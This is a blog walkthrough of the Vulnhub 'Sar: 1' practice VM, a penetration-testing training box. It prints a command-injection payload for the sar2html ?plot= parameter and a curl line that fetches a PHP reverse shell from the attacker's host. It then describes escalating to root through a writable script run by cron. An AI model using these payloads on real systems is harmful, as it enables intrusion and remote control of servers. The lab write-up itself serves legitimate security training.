Vulnhub Sar: 1 Walkthrough
- by Vince
-
in Blog
-
Hits: 7056
It's been a while since I've written up a box and Vulnhub just dumped a fresh batch so here we go...
The box description states: "Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing."
This is a solid entry level box. Nothing complicated and going through standard enumeration should lead to a low privilege shell and root.
We kick off with Nmap:
With only port 80 open, our options are limited. Firing up Nikto:
A phpinfo file but aside from that, slim pickin's. Looking at the web port in the browser:
Checking out robots.txt:
Ok, that's interesting. We find this sar2html app:
As I'm poking around, I find this ?plot= page and I wonder if it's vulnerable to XSS:
Bingo!
It's hard to see but I'm terminating the statement and adding a command: ?plot=;id
Excellent! We have code execution. I decide to look this up on Exploit-db:
We basically learn what we've already uncovered:
I come back with: ?plot=;curl http://192.168.86.99/rshell443.txt --output rshell443.php
Which basically writes a Pentest Monkey reverse shell to the web directory. When we browse to our shell:
We catch our shell:
Snagging the user flag:
A little enumeration and we uncover a cron job:
We dig into the script:
We can't write into finally.sh but we can write into write.sh:
Reusing the shell we already have on the system, we call it from PHP and we wait (5 minutes) and:
We catch our shell and we go after the root flag. #gameover
Fun little box.